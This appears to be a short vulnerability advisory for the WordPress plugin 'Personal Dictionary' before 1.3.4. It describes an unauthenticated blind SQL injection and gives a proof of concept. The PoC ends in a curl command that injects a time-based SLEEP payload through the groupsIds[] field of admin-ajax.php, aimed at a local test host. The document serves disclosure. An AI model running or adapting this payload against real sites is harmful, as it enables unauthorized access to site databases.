Personal Dictionary < 1.3.4 - Unauthenticated SQLi

The plugin fails to properly sanitize user supplied POST data before it is being interpolated in an SQL statement and then executed, leading to a blind SQL injection vulnerability.

PoC

1. Create a new page with the plugin’s shortcode (shortcode can be copied from /wp-admin/admin.php?page=personal-dictionary) 2. Visit the page (as admin) with the shortcode and create a new group (any name is fine) 3. Click on the created group and add a new word to it (the word and it’s translation don’t matter) - then hit save and close 4. Invoke the following curl command to induce a 5 second sleep: curl ‘http://127.0.0.1:8080/wp-admin/admin-ajax.php’ --data ‘action=ays_pd_ajax&function;=ays_pd_game_find_word&groupsIds;[]=1) AND (SELECT 3892 FROM (SELECT(SLEEP(5)))pFvo)-- P’